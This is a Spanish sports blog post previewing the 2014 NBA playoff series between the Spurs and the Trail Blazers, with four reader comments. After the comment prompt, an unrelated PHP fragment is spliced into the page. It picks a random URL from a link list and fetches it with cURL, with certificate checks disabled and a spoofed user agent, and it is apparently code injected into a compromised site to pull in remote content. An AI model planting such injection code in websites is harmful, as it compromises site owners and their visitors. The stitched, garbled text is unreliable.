PO 2014: Previa San Antonio Spurs – Portland Trailblazers

06 de May de 2014 por Nacho

lmatd

El duelo texano será sobre el papel el más desigual en la Conferencia Oeste. Así comenzábamos nuestro análisis de la anterior ronda de los de El Álamo. Y efectivamente sobre el papel era así. Y si ya los Mavs han puesto en aprietos a los campeones de la regular, qué decir de los Blazers, un equipo más hecho, con un jugador franquicia en ascenso y no en la curva descendente de su carrera, y un playmaker con un clutch letal. Pero volvemos a decirlo. Esta es la eliminatoria más desigual del Oeste (obviamente solo hay dos) y me atrevería a decir que la más desigual de lo que nos queda de competición.

El que la serie contra Dallas se haya ido al séptimo partido ha sido más por mérito de los de Dallas que por demérito Spur, pero aún así ha habido varias cosas en Popovich que no han terminado de convencer. Un equipo que viene de arrasar en la regular, entre otras cosas con su distribución de minutos, acorta su rotación. Sigue siendo larga, pero quizás hemos echado en falta algo. Prácticamente ha desaparecido Belinelli. El año pasado sucedió algo similar con Splitter, que este año está cuajando unos muy buenos Playoffs. Quizás es algo que forme parte del carácter militar de Pop, hay que espabilar a sus cadetes, y el italiano en cierta forma lo es. ¿Preparándolo para el futuro?

Todo lo demás, esperable. Salvo la otra grata sorpresa de San Antonio en la serie, Patty Mills. Un Parker a medio gas que al final se ha puesto en modo On, pero que aún así ha rondado los 20 puntos por partido y casi las 5 asistencias. Duncan es Duncan, rey de Escocia, y aún no ha aparecido ningún Macbeth que se atreva a asesinarle. 38 años y sigue en la brecha y de qué forma. Manu que sigue destapando el tarro de las esencias, sublime otra vez… en fin, viejos rockeros que nunca mueren.

Por el noroeste nos llegan desde Portland buenas noticias. Dejó de ser el equipo gafe, dejó de ser el equipo que causaba controversia a través de McMillan, y ha dejado en la estacada al equipo que parecía comerse al mundo. Tienen un equipo hecho, a la vieja usanza. Para lo bueno y para lo malo. Quinteto sólido, un sexto hombre sin rol de titular, otro hombre de rotación y poco más. Quizás se antoja insuficiente contra Spurs. Y sí, han dado la sorpresa, pero no olvidemos que vienen de una serie contra un equipo de similares características, ahora tocará fajarse, y con demasiados frentes.

En la regular han conseguido dos victorias cada uno. El único partido igualado se lo llevaron los Spurs. Aunque ahora todo eso no vale. En Oregón sueñan con una final de Conferencia catorce después. Probablemente se quede en un sueño, pero soñar…

Claves de la eliminatoria:

  • parker lillardFactor LaMarcus. Aldridge se ha mostrado brillante todo el año, más aún en unos Playoffs en los que promedia casi 30 puntos y más de 11 rebotes. El que siga en este ritmo será uno más de los factores que podrían desequilibrar una balanza que parece demasiado inclinada del lado texano. Y LaMarcus tendrá delante al rey Duncan. Y no solo por ser la leyenda que es, sino porque aún sigue dando clinics en este deporte. Además, para los curiosos de las estadísticas, sus números no distan mucho de los estratosféricos del de la Universidad de ¡Texas! (¿cuántos partidos vería del rey?). Casi 18 puntos y 8’5 rebotes, con seis minutos menos de juego y mejores porcentajes.
  • Finales igualados. San Antonio debe liquidar los partidos por la vía rápida, pues si en algo son un peligro los de Oregón es en el clutch time, con Lillard a la cabeza. Claro que Manu y Parker algo pueden decir al respecto.
  • Duelo de banquillos. Stotts-Popovich. Nos quitamos el sombrero ante Pop. Eso no lo duda nadie. De los pocos entrenadores que han sabido adecuarse al momento y en busca de la más pura excelencia baloncestística. ¿Quién nos iba a decir hace años que los Spurs iban a jugar a ritmo alto, grandes anotaciones, juego coral…? Aunque si hay que ponerle un pero es quizás su gestión en postemporada. Claro que el pero es pequeño. Por su parte, Stotts ha manejado su mejor año como entrenador jefe. Sus grandes éxitos han sido como asistente, tanto de Karl como de Carlisle. Incluido el título de los Mavs en 2011. ¿Sabrá encontrar Stotts las debilidades que pueda presentar Pop?

Pronóstico: 4-1 Spurs. San Antonio no debe dar aire al equipo de Oregón si no quiere pasarlo como ante los Mavs. Muchos astros se deben conjuntar para que los Blazers reviertan el favoritismo, que se podría dar. Pero este último partido de los Spurs parece que quiere dejar ciertas cosas claras. Y la más importante es que quieren el anillo. Lo deberán demostrar ante el equipo revelación del año.

Comenta

4 comentarios a esta entrada

  1. Lucho dice:
    #1

    Spurs en 6 para mi

      Citar

  2. Jose Luis dice:
    #2

    Spurs en 5, creo que el pronóstico es correcto.

      Citar

  3. HisRoyalAirness dice:
    #3

    El problema de Portland es que a Duncan le da igual tirar 5 veces y esforzarse para secar a Lamarcus, y a Popovich más. Supongo que rotaran en su defensa pero cuando se ponga Timmy delante se le va a hacer de noche.
    A Lillard es posible que le toque Kawhi por momentos, y puede ser un duelazo de cojones

      Citar

  4. Lucho dice:
    #4

    Que lujo ver jugar a San Antonio en este nivel

    Halftime 39-65

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>